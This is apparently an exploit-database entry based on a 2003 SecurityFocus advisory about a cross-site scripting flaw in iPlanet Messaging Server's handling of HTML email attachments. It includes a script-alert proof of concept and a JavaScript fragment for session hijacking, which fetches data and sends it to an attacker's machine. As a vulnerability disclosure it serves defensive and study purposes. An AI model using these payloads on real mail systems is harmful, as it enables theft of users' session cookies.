iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting

Author: KernelPanikLabs
type: remote
platform: multiple
port: 
date_added: 2003-05-27 
date_updated: 2012-11-13 
verified: 1 
codes: OSVDB-4637 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7704/info

It has been reported that iPlanet Messaging Server may be prone to cross-site scripting attacks. The problem is said to occur while processing HTML attachments received via e-mail. If successfully exploited, a malicious HTML file may be used to steal an unsuspecting users iPlanet Messaging cookies. Other attacks may also be possible.

<html>
<script>alert(document.URL)</script>
</html>

The following script code has been provided to demonstrate indirect session hijacking using web redirection:

function%20steal(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","<URL_to_spoof>",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;

"xmldoc" can be redirected with a "img src", "window.open", to the attacker machine.